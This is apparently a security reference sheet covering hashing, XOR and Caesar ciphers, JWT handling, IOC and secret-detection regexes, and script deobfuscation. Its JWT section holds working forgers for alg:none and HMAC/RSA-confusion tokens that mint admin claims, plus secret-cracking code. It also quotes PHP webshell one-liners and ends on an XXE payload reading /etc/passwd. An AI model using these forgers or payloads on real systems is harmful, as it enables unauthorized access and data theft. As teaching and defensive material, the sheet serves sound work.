# user::domain:server_challenge:ntlmv2_response:blob
# hashcat -m 5600 hash.txt wordlist.txt

Multi-hash utility

import hashlib

def multi_hash(data: bytes) -> dict[str, str]:
    """Compute multiple hashes simultaneously."""
    algorithms = ['md5', 'sha1', 'sha256', 'sha512']
    return {algo: hashlib.new(algo, data).hexdigest() for algo in algorithms}

result = multi_hash(b"password")
for algo, digest in result.items():
    print(f"{algo:>8}: {digest}")

# Hash identification by length
HASH_LENGTHS = {
    32: ['MD5', 'NTLM', 'MD4'],
    40: ['SHA-1'],
    56: ['SHA-224'],
    64: ['SHA-256'],
    96: ['SHA-384'],
    128: ['SHA-512'],
}

def identify_hash(h: str) -> list[str]:
    """Identify possible hash type by length."""
    h = h.strip()
    length = len(h)
    candidates = HASH_LENGTHS.get(length, ['Unknown'])
    # Length alone cannot separate MD5, MD4 and NTLM (all 32 hex characters);
    # use context such as the source file or the dumping tool to decide.
    return candidates
# Bash: compute all hashes at once
echo -n "password" | tee >(md5sum) >(sha1sum) >(sha256sum) >(sha512sum) > /dev/null

# Hash identification with hashid (pip install hashid)
hashid '5f4dcc3b5aa765d61d8327deb882cf99'

# Hash identification with hash-identifier or haiti
haiti '5f4dcc3b5aa765d61d8327deb882cf99'

7. XOR

Single-byte XOR

def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single key byte."""
    return bytes(b ^ key for b in data)

# Encrypt
plaintext = b"attack at dawn"
key = 0x42
ciphertext = xor_single_byte(plaintext, key)
print(ciphertext.hex())   # '233636232129622336622623352c'

# Decrypt (same operation)
recovered = xor_single_byte(ciphertext, key)
assert recovered == plaintext

Multi-byte XOR

from itertools import cycle

def xor_multi_byte(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating multi-byte key."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

plaintext = b"The quick brown fox jumps over the lazy dog"
key = b"SECRET"
ciphertext = xor_multi_byte(plaintext, key)
recovered = xor_multi_byte(ciphertext, key)
assert recovered == plaintext

Single-byte XOR brute force

def xor_bruteforce(ciphertext: bytes) -> list[tuple[int, bytes, float]]:
    """Brute force all 256 single-byte XOR keys. Score by ratio of ASCII letters and spaces."""
    results = []
    for key in range(256):
        candidate = xor_single_byte(ciphertext, key)
        # Letters and spaces discriminate better than "printable": many wrong keys
        # (including key 0x00 here) also yield fully printable output.
        texty = sum(1 for b in candidate
                    if b == 0x20 or 0x41 <= b <= 0x5a or 0x61 <= b <= 0x7a)
        score = texty / len(candidate)
        results.append((key, candidate, score))
    results.sort(key=lambda x: x[2], reverse=True)
    return results

# Example: recover the key for "attack at dawn" XORed with 0x42
encoded = bytes([0x23, 0x36, 0x36, 0x23, 0x21, 0x29, 0x62, 0x23, 0x36, 0x62, 0x26, 0x23, 0x35, 0x2c])
for key, plaintext, score in xor_bruteforce(encoded)[:3]:
    print(f"Key 0x{key:02x} ({score:.0%}): {plaintext}")
# First line: Key 0x42 (100%): b'attack at dawn'

Known-plaintext XOR attack

def xor_known_plaintext(ciphertext: bytes, known_plain: bytes, offset: int = 0) -> bytes:
    """Recover XOR key using known plaintext at a known offset."""
    key_fragment = bytes(c ^ p for c, p in zip(ciphertext[offset:], known_plain))
    return key_fragment

# Example: PE files always start with 'MZ' (0x4d5a)
# If XOR-encoded PE is found, recover first 2 key bytes:
encoded_pe = b'\x1f\x28\x90\x00...'  # hypothetical
known = b'MZ'
key_start = xor_known_plaintext(encoded_pe, known)
print(f"Key starts with: {key_start.hex()}")

# Known plaintext for common file types:
# PE/DLL:   b'MZ' (4d5a)
# ELF:      b'\x7fELF' (7f454c46)
# PDF:      b'%PDF' (25504446)
# ZIP/DOCX: b'PK\x03\x04' (504b0304)
# GZIP:     b'\x1f\x8b' (1f8b)
# PNG:      b'\x89PNG\r\n\x1a\n' (89504e470d0a1a0a)
# JPEG:     b'\xff\xd8\xff' (ffd8ff)

# Recover repeating key length using normalized Hamming distance
# (distinct from Kasiski examination, which looks for repeated ciphertext substrings)
def hamming_distance(b1: bytes, b2: bytes) -> int:
    return sum(bin(a ^ b).count('1') for a, b in zip(b1, b2))

def guess_key_length(ciphertext: bytes, max_len: int = 40) -> list[tuple[int, float]]:
    """Estimate repeating XOR key length via normalized Hamming distance."""
    scores = []
    for kl in range(2, max_len + 1):
        blocks = [ciphertext[i*kl:(i+1)*kl] for i in range(4)]
        if len(blocks[3]) < kl:
            continue
        distances = []
        for i in range(len(blocks)):
            for j in range(i+1, len(blocks)):
                distances.append(hamming_distance(blocks[i], blocks[j]) / kl)
        avg = sum(distances) / len(distances)
        scores.append((kl, avg))
    scores.sort(key=lambda x: x[1])
    return scores[:5]
# Bash: XOR with a Python one-liner
python3 -c "
data = bytes.fromhex('233636232129622336622623352c')
key = 0x42
print(bytes(b ^ key for b in data))
"

# Analyse a XOR-encrypted file with xortool
# pip install xortool
xortool encrypted.bin                    # list probable key lengths
xortool -l 4 -c 00 encrypted.bin         # key length 4, assume 0x00 is the most frequent plaintext byte

8. ROT13 / ROT47 / Caesar

ROT13 (letters only, A-Z / a-z shifted by 13)

import codecs

# Encode/Decode (symmetric — same operation)
encoded = codecs.encode("Attack at dawn", "rot_13")    # "Nggnpx ng qnja"
decoded = codecs.encode(encoded, "rot_13")             # "Attack at dawn"

# Manual implementation
def rot13(text: str) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + 13) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + 13) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)
# Bash
echo "Attack at dawn" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Nggnpx ng qnja
echo "Nggnpx ng qnja" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Attack at dawn

# Alternative
echo "Attack at dawn" | rot13   # if rot13 command available

ROT47 (printable ASCII 33-126, shifted by 47)

def rot47(text: str) -> str:
    """ROT47: rotate printable ASCII characters (! through ~)."""
    result = []
    for c in text:
        o = ord(c)
        if 33 <= o <= 126:
            result.append(chr(33 + (o - 33 + 47) % 94))
        else:
            result.append(c)
    return ''.join(result)

encoded = rot47("Attack at dawn!")     # "pEE24< 2E 52H?P"
decoded = rot47(encoded)               # "Attack at dawn!"
# Bash
echo "Attack at dawn!" | tr '!-~' 'P-~!-O'

General Caesar cipher (arbitrary shift)

def caesar(text: str, shift: int) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + shift) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + shift) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)

# Brute force all 26 shifts
def caesar_bruteforce(ciphertext: str) -> list[tuple[int, str]]:
    return [(shift, caesar(ciphertext, shift)) for shift in range(26)]

# Example: CTF challenge
for shift, candidate in caesar_bruteforce("Gur synt vf PGS{ebg13_vf_rnfl}"):
    if 'CTF' in candidate or 'flag' in candidate.lower():
        print(f"Shift {shift}: {candidate}")
# Shift 13: The flag is CTF{rot13_is_easy}

9. JWT (JSON Web Tokens)

Decode JWT (no verification)

import base64
import json

def jwt_decode(token: str) -> dict:
    """Decode JWT without verification — forensic/analysis use."""
    parts = token.split('.')
    if len(parts) != 3:
        raise ValueError("Invalid JWT format")

    def decode_part(part: str) -> dict:
        # Add padding
        padded = part + '=' * (-len(part) % 4)
        decoded = base64.urlsafe_b64decode(padded)
        return json.loads(decoded)

    header = decode_part(parts[0])
    payload = decode_part(parts[1])
    signature = parts[2]

    return {
        'header': header,
        'payload': payload,
        'signature': signature,
        'raw_parts': parts
    }

# Example
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
result = jwt_decode(token)
print(json.dumps(result['header'], indent=2))
# {"alg": "HS256", "typ": "JWT"}
print(json.dumps(result['payload'], indent=2))
# {"sub": "1234567890", "name": "John Doe", "iat": 1516239022}
# Bash — decode JWT
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d 2>/dev/null
# {"alg":"HS256"}

# Full decode (map the URL-safe alphabet back first; unpadded input makes base64 complain on stderr)
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U"
echo "$TOKEN" | cut -d. -f2 | tr '_-' '/+' | base64 -d 2>/dev/null | python3 -m json.tool

Forge JWT with alg:none attack (CVE-2015-2951)

import base64
import json

def jwt_forge_none(payload: dict) -> str:
    """Forge JWT with alg:none — exploits servers that don't verify algorithm."""
    header = {"alg": "none", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

    return f"{encode_part(header)}.{encode_part(payload)}."

# Forge admin token
forged = jwt_forge_none({
    "sub": "1",
    "name": "admin",
    "role": "admin",
    "iat": 1516239022
})
print(forged)
# eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.

# Variations that bypass filters:
# "alg": "None"
# "alg": "NONE"
# "alg": "nOnE"

Forge JWT with HMAC/RSA confusion (CVE-2016-10555)

import hmac
import hashlib
import base64
import json

def jwt_forge_hmac_rsa_confusion(payload: dict, public_key: bytes) -> str:
    """
    If server uses RS256 but accepts HS256, sign with the PUBLIC key as HMAC secret.
    The server will verify using the public key as HMAC key — signature matches.
    """
    header = {"alg": "HS256", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

    header_b64 = encode_part(header)
    payload_b64 = encode_part(payload)
    signing_input = f"{header_b64}.{payload_b64}".encode()

    signature = hmac.new(public_key, signing_input, hashlib.sha256).digest()
    sig_b64 = base64.urlsafe_b64encode(signature).rstrip(b'=').decode()

    return f"{header_b64}.{payload_b64}.{sig_b64}"

# Usage: obtain server's public key (often in /.well-known/jwks.json or /api/public-key)
# with open("public.pem", "rb") as f:
#     forged = jwt_forge_hmac_rsa_confusion({"sub": "admin"}, f.read())

Crack JWT secret (HS256)

# Using hashcat
hashcat -m 16500 jwt.txt wordlist.txt

# Using john the ripper
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

# Using jwt_tool (pip install jwt_tool)
python3 jwt_tool.py <token> -C -d wordlist.txt
import hmac
import hashlib
import base64

def jwt_crack(token: str, wordlist_path: str) -> str | None:
    """Brute-force HS256 JWT secret from a wordlist."""
    parts = token.split('.')
    if len(parts) != 3:
        raise ValueError("Invalid JWT format")
    signing_input = f"{parts[0]}.{parts[1]}".encode()
    # base64url signatures are unpadded; restore exactly the missing padding
    target_sig = base64.urlsafe_b64decode(parts[2] + '=' * (-len(parts[2]) % 4))

    with open(wordlist_path, 'r', errors='ignore') as f:
        for line in f:
            # Strip only the line ending so secrets containing spaces still match
            secret = line.rstrip('\r\n')
            computed = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
            if hmac.compare_digest(computed, target_sig):
                return secret
    return None

JWT security checklist

Attack | Condition | Mitigation
alg:none | Server accepts unsigned tokens | Reject none algorithm; whitelist allowed algorithms
HMAC/RSA confusion | Server accepts HS256 when configured for RS256 | Enforce algorithm in server config, not from token header
Weak secret | Short/guessable HMAC key | Use 256+ bit random secret
No expiry | Missing exp claim | Always set and validate exp
kid injection | kid header used in SQL/file lookup | Sanitize kid, use allowlist
jwk/jku injection | Server fetches attacker-controlled key | Whitelist key sources
Claim tampering | Only signature checked, not claims | Validate all security-relevant claims server-side

10. Regular Expressions for Security

IPv4 / IPv6

import re

# IPv4 — strict
IPV4 = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\b'
)

# IPv4 with CIDR (prefix length limited to 0-32)
IPV4_CIDR = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)(?:/(?:3[0-2]|[12]?\d))?\b'
)

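# IPv6, simplified: full 8-group form, or a single "::" compression
# (no zone IDs or embedded IPv4; group count is not enforced in the "::" form)
IPV6 = re.compile(
    r'\b(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b'
    r'|(?<![\w:])(?:[0-9a-fA-F]{1,4}(?::[0-9a-fA-F]{1,4})*)?::'
    r'(?:[0-9a-fA-F]{1,4}(?::[0-9a-fA-F]{1,4})*)?(?![\w:])'
)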

# Private/RFC1918 ranges
PRIVATE_IPV4 = re.compile(
    r'\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|'
    r'172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|'
    r'192\.168\.\d{1,3}\.\d{1,3})\b'
)
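
The private-range pattern above accepts impossible octets such as 10.999.1.1, because `\d{1,3}` does not bound the value. One option is to treat regex hits as candidates and confirm them with the standard-library `ipaddress` module. A minimal sketch (`is_rfc1918` is a hypothetical helper name):

```python
import ipaddress

# The three RFC 1918 blocks, listed explicitly. ipaddress's own is_private
# flag is broader (it also covers loopback, link-local, and other ranges).
RFC1918 = [ipaddress.ip_network(n)
           for n in ('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')]


def is_rfc1918(candidate: str) -> bool:
    """True only for syntactically valid IPv4 addresses inside RFC 1918 space."""
    try:
        ip = ipaddress.IPv4Address(candidate)
    except ValueError:          # covers out-of-range octets and malformed input
        return False
    return any(ip in net for net in RFC1918)
```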

URLs

URL = re.compile(
    r'https?://(?:[\w-]+\.)+[\w]{2,}'      # scheme + domain
    r'(?::\d{1,5})?'                         # optional port
    r'(?:/[^\s\'"<>]*)?'                     # optional path
)

# Extract domain from URL
DOMAIN = re.compile(r'https?://([^/:]+)')

Email

EMAIL = re.compile(
    r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b'
)

Hashes (for IOC extraction)

MD5_RE    = re.compile(r'\b[0-9a-fA-F]{32}\b')
SHA1_RE   = re.compile(r'\b[0-9a-fA-F]{40}\b')
SHA256_RE = re.compile(r'\b[0-9a-fA-F]{64}\b')
SHA512_RE = re.compile(r'\b[0-9a-fA-F]{128}\b')

CVE IDs

CVE = re.compile(r'CVE-\d{4}-\d{4,}')

Credit card numbers (PCI DSS scanning)

# Visa
VISA = re.compile(r'\b4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# Mastercard (51-55 prefixes only; the newer 2221-2720 range is not covered)
MC = re.compile(r'\b5[1-5]\d{2}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# AMEX
AMEX = re.compile(r'\b3[47]\d{2}[\s-]?\d{6}[\s-]?\d{5}\b')

# Generic (13-19 digits, optionally separated)
CC_GENERIC = re.compile(r'\b(?:\d[\s-]?){13,19}\b')

def luhn_check(number: str) -> bool:
    """Validate credit card number with Luhn algorithm."""
    digits = [int(d) for d in number if d.isdigit()]
    digits.reverse()
    total = 0
    for i, d in enumerate(digits):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0
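
The generic 13-19 digit pattern matches many order numbers and timestamps, so in practice it is usually paired with the Luhn check to cut false positives. A self-contained sketch of that pairing (`find_card_numbers` and `luhn_ok` are hypothetical names; the regex and checksum repeat the ones above):

```python
import re

CC_CANDIDATE = re.compile(r'\b(?:\d[\s-]?){13,19}\b')


def luhn_ok(number: str) -> bool:
    """Luhn checksum over the digits of number, ignoring separators."""
    digits = [int(d) for d in number if d.isdigit()][::-1]
    total = 0
    for i, d in enumerate(digits):
        if i % 2 == 1:          # every second digit, counting from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_numbers(text: str) -> list[str]:
    """Return digit-only strings that match the pattern and pass Luhn."""
    hits = []
    for m in CC_CANDIDATE.finditer(text):
        digits = re.sub(r'\D', '', m.group(0))
        if luhn_ok(digits):
            hits.append(digits)
    return hits
```

Luhn still passes roughly one in ten random digit strings, so hits are leads for review rather than confirmed card numbers.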

SSN (US Social Security Number)

SSN = re.compile(r'\b\d{3}-\d{2}-\d{4}\b')
# Stricter (excludes known invalid ranges)
SSN_STRICT = re.compile(
    r'\b(?!000|666|9\d{2})\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b'
)

API keys and secrets

# AWS Access Key ID
AWS_KEY = re.compile(r'\b(?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}\b')

# AWS Secret Access Key
AWS_SECRET = re.compile(r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])')

# GitHub Personal Access Token
GITHUB_PAT = re.compile(r'\bghp_[A-Za-z0-9]{36}\b')
GITHUB_PAT_FINE = re.compile(r'\bgithub_pat_[A-Za-z0-9_]{82}\b')

# Slack Bot Token
SLACK_BOT = re.compile(r'\bxoxb-\d{10,13}-\d{10,13}-[a-zA-Z0-9]{24}\b')

# Slack Webhook
SLACK_WEBHOOK = re.compile(r'https://hooks\.slack\.com/services/T[A-Z0-9]{8}/B[A-Z0-9]{8}/[a-zA-Z0-9]{24}')

# Google API Key
GOOGLE_API = re.compile(r'\bAIza[0-9A-Za-z_-]{35}\b')

# Generic high-entropy string (potential secret)
import math
def entropy(s: str) -> float:
    freq = {}
    for c in s:
        freq[c] = freq.get(c, 0) + 1
    return -sum((f/len(s)) * math.log2(f/len(s)) for f in freq.values())

# Strings > 20 chars with entropy > 4.5 are suspicious
GENERIC_SECRET = re.compile(r'(?:key|token|secret|password|api_key|apikey|access_key)\s*[=:]\s*["\']?([A-Za-z0-9+/=_-]{20,})["\']?', re.IGNORECASE)

# Private key markers
PRIVATE_KEY = re.compile(r'-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----')

# JWT pattern
JWT_RE = re.compile(r'\beyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*\b')
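
The entropy helper and the generic assignment pattern are defined separately above. One way to combine them is to keep only captured values whose entropy exceeds the threshold. A sketch under that assumption (`likely_secrets` and the shortened keyword list are illustrative choices, not part of the original):

```python
import math
import re

ASSIGNMENT = re.compile(
    r'(?:key|token|secret|password)\s*[=:]\s*["\']?([A-Za-z0-9+/=_-]{20,})["\']?',
    re.IGNORECASE,
)


def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    counts: dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())


def likely_secrets(text: str, min_entropy: float = 4.5) -> list[str]:
    """Values assigned to secret-looking names that also look random."""
    return [m.group(1) for m in ASSIGNMENT.finditer(text)
            if shannon_entropy(m.group(1)) > min_entropy]
```

A string of n characters can reach at most log2(n) bits per character, so a 4.5 threshold can only be exceeded by values of 23 or more characters; shorter tokens need a lower cutoff.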

Combined IOC extractor

def extract_iocs(text: str) -> dict[str, list[str]]:
    """Extract all security-relevant indicators from text."""
    return {
        'ipv4': list(set(IPV4.findall(text))),
        'email': list(set(EMAIL.findall(text))),
        'url': list(set(URL.findall(text))),
        'md5': list(set(MD5_RE.findall(text))),
        'sha1': list(set(SHA1_RE.findall(text))),
        'sha256': list(set(SHA256_RE.findall(text))),
        'cve': list(set(CVE.findall(text))),
        'aws_key': list(set(AWS_KEY.findall(text))),
        'github_pat': list(set(GITHUB_PAT.findall(text))),
        'jwt': list(set(JWT_RE.findall(text))),
        'private_key': list(set(PRIVATE_KEY.findall(text))),
    }

11. Obfuscation & Deobfuscation

JavaScript obfuscation patterns

# --- JSFuck (encode JS using only []()!+ ) ---
# 's' becomes: (![]+[])[+!+[]+!+[]+!+[]]   i.e. "false"[3]
# Full charset available from 6 characters

# --- Hex escape obfuscation ---
# eval("\x61\x6c\x65\x72\x74\x28\x31\x29")  ->  eval("alert(1)")

# --- Unicode escape ---
# \u0061\u006c\u0065\u0072\u0074(1)  ->  alert(1)

# --- String.fromCharCode ---
# eval(String.fromCharCode(97,108,101,114,116,40,49,41))  ->  eval("alert(1)")

# --- Deobfuscate String.fromCharCode ---
def deobfuscate_charcode(js: str) -> str:
    """Deobfuscate String.fromCharCode() calls."""
    import re
    pattern = r'String\.fromCharCode\(([\d,\s]+)\)'
    def replace(m):
        chars = [int(c.strip()) for c in m.group(1).split(',')]
        return repr(''.join(chr(c) for c in chars))
    return re.sub(pattern, replace, js)

# --- Deobfuscate hex/unicode escapes ---
def deobfuscate_js_escapes(js: str) -> str:
    """Resolve \\xNN and \\uNNNN escapes in JavaScript strings."""
    import re
    # \xNN
    result = re.sub(r'\\x([0-9a-fA-F]{2})',
                    lambda m: chr(int(m.group(1), 16)), js)
    # \uNNNN
    result = re.sub(r'\\u([0-9a-fA-F]{4})',
                    lambda m: chr(int(m.group(1), 16)), result)
    return result

# --- Deobfuscate atob() (base64 in JS) ---
# atob("YWxlcnQoMSk=") -> "alert(1)"
def deobfuscate_atob(js: str) -> str:
    import re, base64
    pattern = r'atob\(["\']([A-Za-z0-9+/=]+)["\']\)'
    def replace(m):
        return repr(base64.b64decode(m.group(1)).decode())
    return re.sub(pattern, replace, js)

PowerShell obfuscation patterns

# --- Encoded command ---
# powershell -enc <base64 of UTF-16LE>
import base64
def decode_ps_encoded_command(encoded: str) -> str:
    return base64.b64decode(encoded).decode('utf-16-le')

# --- String concatenation ---
# 'Inv'+'oke'+'-Exp'+'ression' -> 'Invoke-Expression'

# --- Backtick escaping ---
# I`nv`oke-`Exp`ression -> Invoke-Expression
def deobfuscate_backticks(ps: str) -> str:
    import re
    # Remove backticks that escape normal characters (not special ones)
    return re.sub(r'`([^0abfnrtv])', r'\1', ps)

# --- [char] casts ---
# [char]73 + [char]69 + [char]88 -> 'IEX' (the helper below replaces each cast with its bare character: I + E + X)
def deobfuscate_char_cast(ps: str) -> str:
    import re
    def replace(m):
        return chr(int(m.group(1)))
    return re.sub(r'\[char\]\s*(\d+)', replace, ps, flags=re.IGNORECASE)

# --- Environment variable concatenation ---
# $env:comspec[4,15,25]-join'' -> 'Iex'  (chars 4, 15, 25 of 'C:\WINDOWS\system32\cmd.exe'; command names are case-insensitive)

# --- Compressed / deflate streams ---
# IEX(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream(
#   [IO.MemoryStream][Convert]::FromBase64String('...'),
#   [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()

def decode_ps_deflate(b64_data: str) -> str:
    import base64, zlib
    compressed = base64.b64decode(b64_data)
    # PowerShell uses raw deflate (no zlib header), wbits=-15
    return zlib.decompress(compressed, -15).decode('utf-8', errors='replace')

# --- Combined deobfuscation pipeline ---
def deobfuscate_powershell(script: str) -> str:
    script = deobfuscate_backticks(script)
    script = deobfuscate_char_cast(script)
    # Remove common no-op patterns
    script = script.replace("( ", "(").replace(" )", ")")
    return script
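
The string-concatenation pattern listed above has no helper in the pipeline. A minimal sketch that merges adjacent single-quoted literals joined by `+` (`collapse_ps_concat` is a hypothetical name; double-quoted strings, escaped `''` quotes, and format operators are not handled):

```python
import re

# Two single-quoted literals joined by '+', with optional whitespace.
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def collapse_ps_concat(ps: str) -> str:
    """Repeatedly merge 'a'+'b' into 'ab' until nothing changes."""
    previous = None
    while previous != ps:
        previous = ps
        ps = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", ps)
    return ps
```

Each pass merges non-overlapping pairs, so a chain of four fragments needs two passes; the loop runs until the text stops changing.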

Python obfuscation patterns

# --- exec(compile()) ---
# exec(compile(base64.b64decode(b'cHJpbnQoImhlbGxvIik='),'<string>','exec'))

# --- Lambda chains ---
# (lambda: (lambda f: f(f))(lambda f: print("hello")))()

# --- Marshal/bytecode ---
import marshal, types
code = compile("print('hello')", "<string>", "exec")
serialized = marshal.dumps(code)
# Reconstruct: exec(marshal.loads(serialized))

# --- Deobfuscation: extract strings from exec/eval ---
def safe_deobfuscate_exec(code: str) -> str:
    """Replace exec/eval with print to see what would execute."""
    import re
    code = re.sub(r'\bexec\s*\(', 'print(', code)
    code = re.sub(r'\beval\s*\(', 'print(', code)
    return code
# WARNING: Only run deobfuscated code in a sandbox/VM
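
For the exec(compile(b64decode(...))) pattern specifically, the payload can often be recovered without running anything by decoding the literal directly. A sketch, assuming the base64 data appears as a plain string or bytes literal (`extract_b64_payloads` is a hypothetical name):

```python
import base64
import re

# b64decode('...') or b64decode(b"...") with a literal argument.
B64_CALL = re.compile(r'b64decode\(\s*b?(["\'])([A-Za-z0-9+/=]+)\1\s*\)')


def extract_b64_payloads(source: str) -> list[str]:
    """Decode base64 literals passed to b64decode(); nothing is executed."""
    return [
        base64.b64decode(m.group(2)).decode('utf-8', errors='replace')
        for m in B64_CALL.finditer(source)
    ]
```

Applied to the exec(compile(...)) sample above, this returns the single string `print("hello")`. Payloads assembled at runtime (joined fragments, variables) will not match and need dynamic analysis in a sandbox.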

PHP obfuscation patterns

// Common patterns in webshells:

// eval(base64_decode('...'))
// eval(gzinflate(base64_decode('...')))
// eval(str_rot13('...'))
// preg_replace('/.*/e', base64_decode('...'), '')   // /e modifier = eval (PHP < 7)
// assert(base64_decode('...'))                       // acts like eval
// create_function('', base64_decode('...'))          // anonymous eval

// Variable function calls (hiding function names):
// $f = 'sys'.'tem'; $f('whoami');
// $_GET['cmd']($_GET['arg']);                         // webshell one-liner

// chr() obfuscation:
// $f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109); $f('id');
# Deobfuscate PHP eval(base64_decode(...))
import re
import base64

def deobfuscate_php_b64(php_code: str) -> str:
    pattern = r'(?:eval|assert)\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)\s*\)'
    def replace(m):
        decoded = base64.b64decode(m.group(1)).decode('utf-8', errors='replace')
        return f'/* DECODED: */ {decoded}'
    return re.sub(pattern, replace, php_code)

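# Deobfuscate PHP chr() chains
def deobfuscate_php_chr(php_code: str) -> str:
    """Collapse chr(N).chr(N)... chains into one quoted string literal."""
    # Match a whole chain so only the '.' operators inside it are removed;
    # dots elsewhere in the code (e.g. 'file.php') are left untouched
    chain = re.compile(r'chr\(\s*\d+\s*\)(?:\s*\.\s*chr\(\s*\d+\s*\))*')
    def replace(m):
        codes = re.findall(r'chr\(\s*(\d+)\s*\)', m.group(0))
        # PHP's chr() wraps its argument modulo 256
        return repr(''.join(chr(int(c) % 256) for c in codes))
    return chain.sub(replace, php_code)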
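
The eval(gzinflate(base64_decode('...'))) pattern listed above can be unpacked the same way. PHP's gzinflate() reads raw DEFLATE data, which corresponds to `wbits=-15` in Python's zlib. A sketch for a single layer (`decode_php_gzinflate` is a hypothetical name; webshells often nest several layers, so the output may need another pass):

```python
import base64
import re
import zlib

GZINFLATE_B64 = re.compile(
    r'gzinflate\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)\s*\)'
)


def decode_php_gzinflate(php_code: str) -> list[str]:
    """Return the decompressed text of every gzinflate(base64_decode('...'))."""
    decoded = []
    for m in GZINFLATE_B64.finditer(php_code):
        raw = base64.b64decode(m.group(1))
        # Raw DEFLATE stream: no zlib or gzip header, hence negative wbits.
        decoded.append(zlib.decompress(raw, -15).decode('utf-8', errors='replace'))
    return decoded
```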

12. Serialization Security

JSON

import json

# Standard encode/decode
data = {"user": "admin", "role": "user"}
encoded = json.dumps(data)
decoded = json.loads(encoded)

# Security: JSON injection via key/value manipulation
# If user controls a JSON key or value without escaping:
# {"user": "admin", "role": "user"} could become
# {"user": "admin", "role": "admin"} via parameter pollution

# JSON comment stripping (some parsers accept comments)
# {"key": "value" /* comment */}  -> invalid JSON but some libs accept it

# Large number handling (precision loss)
# JavaScript: JSON.parse('{"id": 9999999999999999}') -> 10000000000000000
# Python handles arbitrary precision; JS does not

# Duplicate key behavior (parser-dependent)
json.loads('{"a": 1, "a": 2}')  # Python: {'a': 2} (last wins)
# Other parsers may take first, error, or behave inconsistently
# Exploitation: WAF parses first key, backend parses last key
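
One defensive option against the duplicate-key mismatch is to reject such documents outright. The standard `json` module exposes `object_pairs_hook`, which receives every key/value pair before they are collapsed into a dict. A minimal sketch (`strict_loads` is a hypothetical name):

```python
import json


def _reject_duplicate_keys(pairs):
    """object_pairs_hook: build the dict, refusing repeated keys."""
    result = {}
    for key, value in pairs:
        if key in result:
            raise ValueError(f"Duplicate key: {key!r}")
        result[key] = value
    return result


def strict_loads(text: str):
    """json.loads that raises ValueError on duplicate object keys."""
    return json.loads(text, object_pairs_hook=_reject_duplicate_keys)
```

The hook is called for every object, including nested ones, so duplicates are caught at any depth.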

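XML (XXE, SSRF, billion laughs)

# --- DANGEROUS: many XML parsers resolve external entities by default (XXE) ---
# Python's xml.etree.ElementTree does not fetch external entities, but with older
# Expat builds it is still exposed to entity-expansion DoS; prefer defusedxml for untrusted input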

# XXE payload examples:
xxe_file_read = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
